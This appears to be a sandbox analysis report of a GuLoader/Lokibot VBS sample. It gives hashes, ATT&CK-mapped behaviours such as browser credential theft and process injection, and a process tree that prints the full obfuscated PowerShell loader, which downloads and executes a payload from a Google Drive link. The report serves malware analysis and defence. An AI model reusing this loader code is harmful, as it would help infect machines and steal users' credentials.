guloader | 8b496e6f6fa5824fc7a95dc9844fdcbbb3d8abb215476ffc2e2abe0142be0447

General

Target

8b496e6f6fa5824fc7a95dc9844fdcbbb3d8abb215476ffc2e2abe0142be0447.vbs
Size

33KB
MD5

0d5aa3c54f12fb3d254dc0ed6f946d2e
SHA1

04d6915391bc112a8dcc482616473d21e67209ac
SHA256

8b496e6f6fa5824fc7a95dc9844fdcbbb3d8abb215476ffc2e2abe0142be0447
SHA512

0e416cd7f37c8266269894ac768fc57172e55685555ed2db10ed74cba0f4d64b45d3582acd1a0717f47becd23450f5aec4038434366ccdb1a2cad2524c42e9d0
SSDEEP

384:Z9vOg3hVg1cC9a4pYTagc3NE7p5sUm5zSouEDfvl/7GRh/DvvxsWoutDwTK:Zp3hzC9aqYTEZUKXDfN/7GR1zxsODb

Score

10^/10

guloader lokibot collection credential_access discovery downloader execution spyware stealer trojan

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader
Lokibot
Lokibot is a Password and CryptoCoin Wallet Stealer.
trojan spyware stealer lokibot
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	2480	powershell.exe
7	2480	powershell.exe

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	wabmig.exe
Key opened	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook	wabmig.exe
Key opened	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	wabmig.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2480	powershell.exe
2644	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
4	drive.google.com
5	drive.google.com
9	drive.google.com

Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs

pid	Process
1944	wabmig.exe
1944	wabmig.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2644	powershell.exe
1944	wabmig.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2644 set thread context of 1944	2644	powershell.exe	38

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wabmig.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
2644	powershell.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2480	powershell.exe
2644	powershell.exe
2644	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
2644	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2480	powershell.exe
Token: SeDebugPrivilege	2644	powershell.exe
Token: SeDebugPrivilege	1944	wabmig.exe

Suspicious use of WriteProcessMemory 23 IoCs

description	pid	Process	procid_target
PID 2508 wrote to memory of 2480	2508	WScript.exe	30
PID 2508 wrote to memory of 2480	2508	WScript.exe	30
PID 2508 wrote to memory of 2480	2508	WScript.exe	30
PID 2480 wrote to memory of 2872	2480	powershell.exe	32
PID 2480 wrote to memory of 2872	2480	powershell.exe	32
PID 2480 wrote to memory of 2872	2480	powershell.exe	32
PID 2480 wrote to memory of 2620	2480	powershell.exe	35
PID 2480 wrote to memory of 2620	2480	powershell.exe	35
PID 2480 wrote to memory of 2620	2480	powershell.exe	35
PID 2620 wrote to memory of 2644	2620	cmd.exe	36
PID 2620 wrote to memory of 2644	2620	cmd.exe	36
PID 2620 wrote to memory of 2644	2620	cmd.exe	36
PID 2620 wrote to memory of 2644	2620	cmd.exe	36
PID 2644 wrote to memory of 2380	2644	powershell.exe	37
PID 2644 wrote to memory of 2380	2644	powershell.exe	37
PID 2644 wrote to memory of 2380	2644	powershell.exe	37
PID 2644 wrote to memory of 2380	2644	powershell.exe	37
PID 2644 wrote to memory of 1944	2644	powershell.exe	38
PID 2644 wrote to memory of 1944	2644	powershell.exe	38
PID 2644 wrote to memory of 1944	2644	powershell.exe	38
PID 2644 wrote to memory of 1944	2644	powershell.exe	38
PID 2644 wrote to memory of 1944	2644	powershell.exe	38
PID 2644 wrote to memory of 1944	2644	powershell.exe	38

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	wabmig.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	wabmig.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8b496e6f6fa5824fc7a95dc9844fdcbbb3d8abb215476ffc2e2abe0142be0447.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2508
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Arapunga Screenland Manerlig Ransage Underdaniges #>;$Anacanthous='Startsymbolernes';<#Laboratorietekniker Kommunalforvaltningen Gravskndere Ringene #>;$Talstrkest=$host.PrivateData;If ($Talstrkest) {$Hjrnetnder++;}function Klanens($Tamgs){$Hviskhedernes=$Tamgs.Length-$Hjrnetnder;for( $Awaredom=5;$Awaredom -lt $Hviskhedernes;$Awaredom+=6){$Strintes+=$Tamgs[$Awaredom];}$Strintes;}function Unslyness($Tankrensninger){ . ($Sunbelts) ($Tankrensninger);}$Monoscelans=Klanens 'Si uaMMo,eho N utz SejriCarl,lUnkenlKibitaSynba/ ampa5 tnin.Slaae0Frers Up a(Jac tWDamkuiTrfsanFejlmdOuranoUdvekwHypn s.anne OsterNS.manT Insu Egual1Coemp0Kanes.Reprs0W.llo;Klage GlummWP,lisiEsma nV der6 agt4 Syze; eskf Semimx Aut,6S and4 igit;Koran rivvrTikr.v ull:Syned1 Roma2C unt1F und.Sna,p0 Arki)An.id HoveGoutswe ieldc eclakWanseo Bru /Jumbl2V.ric0Block1Fste.0Kobli0Svige1Opvas0Tjene1Tosta SubscFNedtri GummrBypareS,uabfProweoEmbedxAnder/Gelat1Conci2Verde1Mytho.Vacon0Pachy ';$Afsendelsesprioriterings=Klanens 'MakefuUnsh SIdyllE For rHussp-DistraPostsG DioeeReconnTi liTCur.y ';$Troutier186=Klanens 'P rsohRetrut Di ttathe,p,umalsN.nco:Ornam/botan/KiessdBillerGuaraiPr,ntviris e Kapp. FestgEgilaoFingeo overgOpdyrl NotoeHersk.Habi.cBlindoSpgenm Milj/FilliuCivilcSigna?Ansgne,prngx DarlpSnus oag vrr.agtktPhlyz=Fri,rdTyroloNormawtheeznPyroml Panto RelaaResuldRatsb& lektiBipardDaske=Korsv1PodanlTurgeIFu.kt7BulnuSMindeo prebYHerenb Gear_.eartaHelenB ,arnEJulefmArthrRPi,oamRi.esJgroo JSigg I,crum-Lik euUn ov3Unn,u1FemhuJ PulcgTaa swChorutMul iX rapsJNitteMMo dtn ook_Ti.amQDukkem Rola ';$Papermouth=Klanens 'frist> Joyc ';$Sunbelts=Klanens ' ravii Dat.ea.shaxMilie ';$Jochums='tragicomedies';$Energiministre222 = Klanens 'Anfrse ibboc ategh TonaoRense paga %Endoca,idsspForhap llerdIndsvaCa.ictabuliaVandr%Rvful\ SingTUri,rrTil.rkAntiliHat hsColovt WatceunflorMuha nWaldmeB.dfasLemon.kajplB nterr B,sikDissi Re r&uvish&Mord. MassieHibaccFja,thDysmooSkinn For rtHenst ';Unslyness (Klanens 'S rud$S.gnagBoguslDest,oDehisbs.mmeaKlassl Ho.l:RektiFDieneoSol,erCodele F.skb MadcyHypofgC,lubgOver.eDisabnSt.kkdMussyeMushrsPolyp=Manna( dgrac Travm R endDa ne arr/Mithrcs vef op.ta$HvideEWhelknMottle erisr Vejkglr aniPlan mEnwheiStrukn Glutib.ngasL vsst S mmrClasseDi ne2St mf2 Lege2Egenn)Bkken ');Unslyness (Klanens 'Prod $NaphtgHai elBrugeoEpistb,enseaBereglGurly:Rdt.rPKvator Veino ChifcApae tTu kei Uk,ttthirsiBippesSwell=Chick$waitiTOsteorRo gho uppluMilitt Baldi SikreTelear Con 1Taxic8I.ves6notal.BssemssociapMeanilChamaiThirtt ndua(s att$SunshPTreskaTetrapcelebeEnr vrVaab mUnosto Mar uForlatTapr,h Isla)Ba si ');Unslyness (Klanens 'Bloms[ sam NMes,ieHaplotoutdr.St keSege.teBetalrDalhovUnde iDronecHypereSko.kPOver oBastiiSeppanAknowt histM Kvaka TreanPreexa Fo kg BruteSojabrBemgt]Ski f:Dybfr:InstaSTvaere Mir,c blinuTinglrDualiiSemivtOmfavyUnw.iPHumplrOvul oAnti t IrisoSelv,cSwishoCitrilB man Indta= Inko nd,s[MaaseNAssu eSmr atVagui.PlataS ircueComptcKoffauAmbitr S jliKultitNonbeyChemiPFiskerAnviso Trift SultoColumcT maroDipl l ArraTHelicyFuldap VarieOve,b]Incus:Cent,:bukkeT Cymbl pra sS.dko1 Real2Ru em ');$Troutier186=$Proctitis[0];$Kirkegaardsjorde= (Klanens 'Clogs$ForviGFir.ml VadeOMod,sBBrodsa Fen lAlpha: CambVOmb tiRi gnecon,uL recuSFlydeE KnigsRente=RadikNSln ke,yrlawEu ar-PolyhOBulksbSummojKo cieFluorCTarlaTpolar Colo,SKompeYMadlaS angtS.attETwinsMplati.PlacenSand,e.ommaT Seam.Uf,rsWFeminE .ckpB dveCEnverL Fod iSuperEAir un,eremT');$Kirkegaardsjorde+=$Forebyggendes[1];Unslyness ($Kirkegaardsjorde);Unslyness (Klanens 'Begre$Fa tiV AdieiCelleeBlodpl isposAfstieRiotpssenti. ubtuHHead eE icuaSyncodSutureMi enrS,ttosOrdov[D ssi$Lab rA IrrafmareksSoutheCo.trnMaa idVirree SelvlSel bs AmfeeAsexus Ns fpBulgerRom.diA fejoBamburgrkerirefrit d ele spolrOasitiO,olunAf seg Larysvagab]Exce =R ann$OpthaMFrosco SolinSubfioTr dis.ngricDurskePar,gl PaknaS eysnGrummsNskes ');$Forlagsredaktrens=Klanens 'Omniu$ embeV uftaiAd.aneSygedlSki ssPaafyefigursSymme.StrygDBorgeooutfiw SkrpnBhootlTenoroPuffea Ant d S miFnonbuiHogvelPigwee gudm( mimi$MistnT Ennor bauxo evgu Ha ntIm uniCoerce rotor Med,1 Lymp8Me hj6Funam, Acco$ KorrPSmageyBruger FlucaLakrimSlaveiStenbdqui.z) Co,p ';$Pyramid=$Forebyggendes[0];Unslyness (Klanens 'Vespe$C ntiG Ripal lexiOLatinb slavA UnaaL oint:educaGFor,roOccipTDiscoePla p=Per n(MttentCatoneDi meS OrtyT Hard-Ans.uP OutrA ,illtPakprHMiscl origi$adultpBridoy ForhrGoldeaBr,ntmSejlfiRe.redLyssi)Spani ');while (!$Gote) {Unslyness (Klanens 'Frate$PintagDowablT icao Dek,bVulgaaC trolEmpir:BusseNObligemaryswSyd vlHippoiVigoun.nevoeKomposUrobi=Glemm$ Ka et Kirkr La,tuAnlgsePerse ') ;Unslyness $Forlagsredaktrens;Unslyness (Klanens 'ro.beS DagdtTappeaOver,rMet ytXenol-CruciS s.ejl DesoeMun eeKandip Alle No,le4Arrig ');Unslyness (Klanens 'Weine$Suppog FjerlMo.aloBonavbTaarnaHyst l ecen: hel G Warso Op.ttKittee mast=M,nuf(SdvanTSaccheR lats jeset madr- Res.PB,ykoa Strat BismhFinke Tand$IsuroP Aldey inger,argiaasylamReteaiBurisd Brug)Suppr ') ;Unslyness (Klanens 'Dispe$C okegCessalU appoNonetbMa,hraSi edlSkabe:ScryeTO jekeRetrolBade.e orsopHikkelagoraaLilacyRente=Antio$MekangAr iclPresaoHinnebP otoaSemiclHoved:D,sorSCalory leuknParabtSuperaChronkCere sSmigrmInd.baPart eSkipps dekas MoreiAndesgridestIn si+bygko+Tugte%unmu $ChoriP MetorUnfuroLderbcUdkrst Unici PrestNonatiBaidasBesna.Abidac G,oboFremtu Bantn Drift Bein ') ;$Troutier186=$Proctitis[$Teleplay];}$kamillo=333348;$Hoys=29133;Unslyness (Klanens 'Lempn$Vom,tgBreedlDamplo CondbMa riaVirksl Tjre:Skakks Reg g.eglsePall,rHrbare unltGlatnnPlougi lvlanBaandgKamenewidennRhesu Hiber=Unrea Sla GTran e TidetRydde- Pol CNoct oUdfrsnEv.ditFaksieS.uscnProgrtCoemp K lku$TautoPbegroyrhumbrNonreaRegiomNonseiInfradPseud ');Unslyness (Klanens ' Trag$ owargKuverl.omeroLotanbSammeaRejusl ,riv: fklaG Proct AktieFlawepSysteaIll.mg.ecrotSca reFrekvnSoven1Argum5Adven8 E sk Laita=Obli Natu[ BantS.ogstyBeligsTugget Undee MiscmSkraa.WitzcC.loddoKlemen C pevOp,rse M.larteg,ttBans ]Ine.f:Mu.li:EducaFMisadrSupraoKa dsmSurahBPussea Lovns ueinepree 6St in4Ga dhSSalattAbranr I dbiCompunS.rivg Bort(trlas$,lodgsT mpeg SacceDestrrFrisieRespotkel inruperiudmntnB dekgkomple urflnKlap )Uria ');Unslyness (Klanens ' Mimr$CockegVerifl Ba,uo B,ndbDrivgaLiguslKopio:Bone SvoldfkFurbieAk iew ismaePhenyd Tors Desig= Ort Irreg[Tu inStrickyPantosErgomtKazooe armem Befa.La,peT Csare Oss,xSalintepide.c ntaE ultin SkidcO tanoT bskd beriiHypoin JerngDropf].ense:praeg:L jevAIrrecSFise CSfor IDrnenIdr.km.ThorhG avvreRailrtFreskSberett DyderRegeliErsrenVouchgPreou( Picn$Patt GSpe mtPar meGer gpR.stia tersgarrest Chece Begrn ,adi1Micro5Skage8Qu me)Blide ');Unslyness (Klanens 'Pro y$Rem dgGaelilAflytoCheezbRetsmaTrolilKredi:MaalrKKillilroastoth,argObtuntTil,s=Skraa$OverpSHelvekNuance,uffewVengieNomosdOvers.NedslsCif.euKrakibevig s Inc.tV rlirForskiDeletnNedklgCha.q(Carla$Tele kSubnuaChampmCourtiDiktalNedl lMaskeom rra,zardm$ CentH ForvoSquawyNe,tesMbler)Sp cu ');Unslyness $Klogt;"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2480
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Trkisternes.Brk && echo t"
    3⤵
    PID:2872
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c ^"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "<#Arapunga Screenland Manerlig Ransage Underdaniges #>;$Anacanthous='Startsymbolernes';<#Laboratorietekniker Kommunalforvaltningen Gravskndere Ringene #>;$Talstrkest=$host.PrivateData;If ($Talstrkest) {$Hjrnetnder++;}function Klanens($Tamgs){$Hviskhedernes=$Tamgs.Length-$Hjrnetnder;for( $Awaredom=5;$Awaredom -lt $Hviskhedernes;$Awaredom+=6){$Strintes+=$Tamgs[$Awaredom];}$Strintes;}function Unslyness($Tankrensninger){ . ($Sunbelts) ($Tankrensninger);}$Monoscelans=Klanens 'Si uaMMo,eho N utz SejriCarl,lUnkenlKibitaSynba/ ampa5 tnin.Slaae0Frers Up a(Jac tWDamkuiTrfsanFejlmdOuranoUdvekwHypn s.anne OsterNS.manT Insu Egual1Coemp0Kanes.Reprs0W.llo;Klage GlummWP,lisiEsma nV der6 agt4 Syze; eskf Semimx Aut,6S and4 igit;Koran rivvrTikr.v ull:Syned1 Roma2C unt1F und.Sna,p0 Arki)An.id HoveGoutswe ieldc eclakWanseo Bru /Jumbl2V.ric0Block1Fste.0Kobli0Svige1Opvas0Tjene1Tosta SubscFNedtri GummrBypareS,uabfProweoEmbedxAnder/Gelat1Conci2Verde1Mytho.Vacon0Pachy ';$Afsendelsesprioriterings=Klanens 'MakefuUnsh SIdyllE For rHussp-DistraPostsG DioeeReconnTi liTCur.y ';$Troutier186=Klanens 'P rsohRetrut Di ttathe,p,umalsN.nco:Ornam/botan/KiessdBillerGuaraiPr,ntviris e Kapp. FestgEgilaoFingeo overgOpdyrl NotoeHersk.Habi.cBlindoSpgenm Milj/FilliuCivilcSigna?Ansgne,prngx DarlpSnus oag vrr.agtktPhlyz=Fri,rdTyroloNormawtheeznPyroml Panto RelaaResuldRatsb& lektiBipardDaske=Korsv1PodanlTurgeIFu.kt7BulnuSMindeo prebYHerenb Gear_.eartaHelenB ,arnEJulefmArthrRPi,oamRi.esJgroo JSigg I,crum-Lik euUn ov3Unn,u1FemhuJ PulcgTaa swChorutMul iX rapsJNitteMMo dtn ook_Ti.amQDukkem Rola ';$Papermouth=Klanens 'frist> Joyc ';$Sunbelts=Klanens ' ravii Dat.ea.shaxMilie ';$Jochums='tragicomedies';$Energiministre222 = Klanens 'Anfrse ibboc ategh TonaoRense paga %Endoca,idsspForhap llerdIndsvaCa.ictabuliaVandr%Rvful\ SingTUri,rrTil.rkAntiliHat hsColovt WatceunflorMuha nWaldmeB.dfasLemon.kajplB nterr B,sikDissi Re r&uvish&Mord. MassieHibaccFja,thDysmooSkinn For rtHenst ';Unslyness (Klanens 'S rud$S.gnagBoguslDest,oDehisbs.mmeaKlassl Ho.l:RektiFDieneoSol,erCodele F.skb MadcyHypofgC,lubgOver.eDisabnSt.kkdMussyeMushrsPolyp=Manna( dgrac Travm R endDa ne arr/Mithrcs vef op.ta$HvideEWhelknMottle erisr Vejkglr aniPlan mEnwheiStrukn Glutib.ngasL vsst S mmrClasseDi ne2St mf2 Lege2Egenn)Bkken ');Unslyness (Klanens 'Prod $NaphtgHai elBrugeoEpistb,enseaBereglGurly:Rdt.rPKvator Veino ChifcApae tTu kei Uk,ttthirsiBippesSwell=Chick$waitiTOsteorRo gho uppluMilitt Baldi SikreTelear Con 1Taxic8I.ves6notal.BssemssociapMeanilChamaiThirtt ndua(s att$SunshPTreskaTetrapcelebeEnr vrVaab mUnosto Mar uForlatTapr,h Isla)Ba si ');Unslyness (Klanens 'Bloms[ sam NMes,ieHaplotoutdr.St keSege.teBetalrDalhovUnde iDronecHypereSko.kPOver oBastiiSeppanAknowt histM Kvaka TreanPreexa Fo kg BruteSojabrBemgt]Ski f:Dybfr:InstaSTvaere Mir,c blinuTinglrDualiiSemivtOmfavyUnw.iPHumplrOvul oAnti t IrisoSelv,cSwishoCitrilB man Indta= Inko nd,s[MaaseNAssu eSmr atVagui.PlataS ircueComptcKoffauAmbitr S jliKultitNonbeyChemiPFiskerAnviso Trift SultoColumcT maroDipl l ArraTHelicyFuldap VarieOve,b]Incus:Cent,:bukkeT Cymbl pra sS.dko1 Real2Ru em ');$Troutier186=$Proctitis[0];$Kirkegaardsjorde= (Klanens 'Clogs$ForviGFir.ml VadeOMod,sBBrodsa Fen lAlpha: CambVOmb tiRi gnecon,uL recuSFlydeE KnigsRente=RadikNSln ke,yrlawEu ar-PolyhOBulksbSummojKo cieFluorCTarlaTpolar Colo,SKompeYMadlaS angtS.attETwinsMplati.PlacenSand,e.ommaT Seam.Uf,rsWFeminE .ckpB dveCEnverL Fod iSuperEAir un,eremT');$Kirkegaardsjorde+=$Forebyggendes[1];Unslyness ($Kirkegaardsjorde);Unslyness (Klanens 'Begre$Fa tiV AdieiCelleeBlodpl isposAfstieRiotpssenti. ubtuHHead eE icuaSyncodSutureMi enrS,ttosOrdov[D ssi$Lab rA IrrafmareksSoutheCo.trnMaa idVirree SelvlSel bs AmfeeAsexus Ns fpBulgerRom.diA fejoBamburgrkerirefrit d ele spolrOasitiO,olunAf seg Larysvagab]Exce =R ann$OpthaMFrosco SolinSubfioTr dis.ngricDurskePar,gl PaknaS eysnGrummsNskes ');$Forlagsredaktrens=Klanens 'Omniu$ embeV uftaiAd.aneSygedlSki ssPaafyefigursSymme.StrygDBorgeooutfiw SkrpnBhootlTenoroPuffea Ant d S miFnonbuiHogvelPigwee gudm( mimi$MistnT Ennor bauxo evgu Ha ntIm uniCoerce rotor Med,1 Lymp8Me hj6Funam, Acco$ KorrPSmageyBruger FlucaLakrimSlaveiStenbdqui.z) Co,p ';$Pyramid=$Forebyggendes[0];Unslyness (Klanens 'Vespe$C ntiG Ripal lexiOLatinb slavA UnaaL oint:educaGFor,roOccipTDiscoePla p=Per n(MttentCatoneDi meS OrtyT Hard-Ans.uP OutrA ,illtPakprHMiscl origi$adultpBridoy ForhrGoldeaBr,ntmSejlfiRe.redLyssi)Spani ');while (!$Gote) {Unslyness (Klanens 'Frate$PintagDowablT icao Dek,bVulgaaC trolEmpir:BusseNObligemaryswSyd vlHippoiVigoun.nevoeKomposUrobi=Glemm$ Ka et Kirkr La,tuAnlgsePerse ') ;Unslyness $Forlagsredaktrens;Unslyness (Klanens 'ro.beS DagdtTappeaOver,rMet ytXenol-CruciS s.ejl DesoeMun eeKandip Alle No,le4Arrig ');Unslyness (Klanens 'Weine$Suppog FjerlMo.aloBonavbTaarnaHyst l ecen: hel G Warso Op.ttKittee mast=M,nuf(SdvanTSaccheR lats jeset madr- Res.PB,ykoa Strat BismhFinke Tand$IsuroP Aldey inger,argiaasylamReteaiBurisd Brug)Suppr ') ;Unslyness (Klanens 'Dispe$C okegCessalU appoNonetbMa,hraSi edlSkabe:ScryeTO jekeRetrolBade.e orsopHikkelagoraaLilacyRente=Antio$MekangAr iclPresaoHinnebP otoaSemiclHoved:D,sorSCalory leuknParabtSuperaChronkCere sSmigrmInd.baPart eSkipps dekas MoreiAndesgridestIn si+bygko+Tugte%unmu $ChoriP MetorUnfuroLderbcUdkrst Unici PrestNonatiBaidasBesna.Abidac G,oboFremtu Bantn Drift Bein ') ;$Troutier186=$Proctitis[$Teleplay];}$kamillo=333348;$Hoys=29133;Unslyness (Klanens 'Lempn$Vom,tgBreedlDamplo CondbMa riaVirksl Tjre:Skakks Reg g.eglsePall,rHrbare unltGlatnnPlougi lvlanBaandgKamenewidennRhesu Hiber=Unrea Sla GTran e TidetRydde- Pol CNoct oUdfrsnEv.ditFaksieS.uscnProgrtCoemp K lku$TautoPbegroyrhumbrNonreaRegiomNonseiInfradPseud ');Unslyness (Klanens ' Trag$ owargKuverl.omeroLotanbSammeaRejusl ,riv: fklaG Proct AktieFlawepSysteaIll.mg.ecrotSca reFrekvnSoven1Argum5Adven8 E sk Laita=Obli Natu[ BantS.ogstyBeligsTugget Undee MiscmSkraa.WitzcC.loddoKlemen C pevOp,rse M.larteg,ttBans ]Ine.f:Mu.li:EducaFMisadrSupraoKa dsmSurahBPussea Lovns ueinepree 6St in4Ga dhSSalattAbranr I dbiCompunS.rivg Bort(trlas$,lodgsT mpeg SacceDestrrFrisieRespotkel inruperiudmntnB dekgkomple urflnKlap )Uria ');Unslyness (Klanens ' Mimr$CockegVerifl Ba,uo B,ndbDrivgaLiguslKopio:Bone SvoldfkFurbieAk iew ismaePhenyd Tors Desig= Ort Irreg[Tu inStrickyPantosErgomtKazooe armem Befa.La,peT Csare Oss,xSalintepide.c ntaE ultin SkidcO tanoT bskd beriiHypoin JerngDropf].ense:praeg:L jevAIrrecSFise CSfor IDrnenIdr.km.ThorhG avvreRailrtFreskSberett DyderRegeliErsrenVouchgPreou( Picn$Patt GSpe mtPar meGer gpR.stia tersgarrest Chece Begrn ,adi1Micro5Skage8Qu me)Blide ');Unslyness (Klanens 'Pro y$Rem dgGaelilAflytoCheezbRetsmaTrolilKredi:MaalrKKillilroastoth,argObtuntTil,s=Skraa$OverpSHelvekNuance,uffewVengieNomosdOvers.NedslsCif.euKrakibevig s Inc.tV rlirForskiDeletnNedklgCha.q(Carla$Tele kSubnuaChampmCourtiDiktalNedl lMaskeom rra,zardm$ CentH ForvoSquawyNe,tesMbler)Sp cu ');Unslyness $Klogt;"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2620
  - - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Arapunga Screenland Manerlig Ransage Underdaniges #>;$Anacanthous='Startsymbolernes';<#Laboratorietekniker Kommunalforvaltningen Gravskndere Ringene #>;$Talstrkest=$host.PrivateData;If ($Talstrkest) {$Hjrnetnder++;}function Klanens($Tamgs){$Hviskhedernes=$Tamgs.Length-$Hjrnetnder;for( $Awaredom=5;$Awaredom -lt $Hviskhedernes;$Awaredom+=6){$Strintes+=$Tamgs[$Awaredom];}$Strintes;}function Unslyness($Tankrensninger){ . ($Sunbelts) ($Tankrensninger);}$Monoscelans=Klanens 'Si uaMMo,eho N utz SejriCarl,lUnkenlKibitaSynba/ ampa5 tnin.Slaae0Frers Up a(Jac tWDamkuiTrfsanFejlmdOuranoUdvekwHypn s.anne OsterNS.manT Insu Egual1Coemp0Kanes.Reprs0W.llo;Klage GlummWP,lisiEsma nV der6 agt4 Syze; eskf Semimx Aut,6S and4 igit;Koran rivvrTikr.v ull:Syned1 Roma2C unt1F und.Sna,p0 Arki)An.id HoveGoutswe ieldc eclakWanseo Bru /Jumbl2V.ric0Block1Fste.0Kobli0Svige1Opvas0Tjene1Tosta SubscFNedtri GummrBypareS,uabfProweoEmbedxAnder/Gelat1Conci2Verde1Mytho.Vacon0Pachy ';$Afsendelsesprioriterings=Klanens 'MakefuUnsh SIdyllE For rHussp-DistraPostsG DioeeReconnTi liTCur.y ';$Troutier186=Klanens 'P rsohRetrut Di ttathe,p,umalsN.nco:Ornam/botan/KiessdBillerGuaraiPr,ntviris e Kapp. FestgEgilaoFingeo overgOpdyrl NotoeHersk.Habi.cBlindoSpgenm Milj/FilliuCivilcSigna?Ansgne,prngx DarlpSnus oag vrr.agtktPhlyz=Fri,rdTyroloNormawtheeznPyroml Panto RelaaResuldRatsb& lektiBipardDaske=Korsv1PodanlTurgeIFu.kt7BulnuSMindeo prebYHerenb Gear_.eartaHelenB ,arnEJulefmArthrRPi,oamRi.esJgroo JSigg I,crum-Lik euUn ov3Unn,u1FemhuJ PulcgTaa swChorutMul iX rapsJNitteMMo dtn ook_Ti.amQDukkem Rola ';$Papermouth=Klanens 'frist> Joyc ';$Sunbelts=Klanens ' ravii Dat.ea.shaxMilie ';$Jochums='tragicomedies';$Energiministre222 = Klanens 'Anfrse ibboc ategh TonaoRense paga %Endoca,idsspForhap llerdIndsvaCa.ictabuliaVandr%Rvful\ SingTUri,rrTil.rkAntiliHat hsColovt WatceunflorMuha nWaldmeB.dfasLemon.kajplB nterr B,sikDissi Re r&uvish&Mord. MassieHibaccFja,thDysmooSkinn For rtHenst ';Unslyness (Klanens 'S rud$S.gnagBoguslDest,oDehisbs.mmeaKlassl Ho.l:RektiFDieneoSol,erCodele F.skb MadcyHypofgC,lubgOver.eDisabnSt.kkdMussyeMushrsPolyp=Manna( dgrac Travm R endDa ne arr/Mithrcs vef op.ta$HvideEWhelknMottle erisr Vejkglr aniPlan mEnwheiStrukn Glutib.ngasL vsst S mmrClasseDi ne2St mf2 Lege2Egenn)Bkken ');Unslyness (Klanens 'Prod $NaphtgHai elBrugeoEpistb,enseaBereglGurly:Rdt.rPKvator Veino ChifcApae tTu kei Uk,ttthirsiBippesSwell=Chick$waitiTOsteorRo gho uppluMilitt Baldi SikreTelear Con 1Taxic8I.ves6notal.BssemssociapMeanilChamaiThirtt ndua(s att$SunshPTreskaTetrapcelebeEnr vrVaab mUnosto Mar uForlatTapr,h Isla)Ba si ');Unslyness (Klanens 'Bloms[ sam NMes,ieHaplotoutdr.St keSege.teBetalrDalhovUnde iDronecHypereSko.kPOver oBastiiSeppanAknowt histM Kvaka TreanPreexa Fo kg BruteSojabrBemgt]Ski f:Dybfr:InstaSTvaere Mir,c blinuTinglrDualiiSemivtOmfavyUnw.iPHumplrOvul oAnti t IrisoSelv,cSwishoCitrilB man Indta= Inko nd,s[MaaseNAssu eSmr atVagui.PlataS ircueComptcKoffauAmbitr S jliKultitNonbeyChemiPFiskerAnviso Trift SultoColumcT maroDipl l ArraTHelicyFuldap VarieOve,b]Incus:Cent,:bukkeT Cymbl pra sS.dko1 Real2Ru em ');$Troutier186=$Proctitis[0];$Kirkegaardsjorde= (Klanens 'Clogs$ForviGFir.ml VadeOMod,sBBrodsa Fen lAlpha: CambVOmb tiRi gnecon,uL recuSFlydeE KnigsRente=RadikNSln ke,yrlawEu ar-PolyhOBulksbSummojKo cieFluorCTarlaTpolar Colo,SKompeYMadlaS angtS.attETwinsMplati.PlacenSand,e.ommaT Seam.Uf,rsWFeminE .ckpB dveCEnverL Fod iSuperEAir un,eremT');$Kirkegaardsjorde+=$Forebyggendes[1];Unslyness ($Kirkegaardsjorde);Unslyness (Klanens 'Begre$Fa tiV AdieiCelleeBlodpl isposAfstieRiotpssenti. ubtuHHead eE 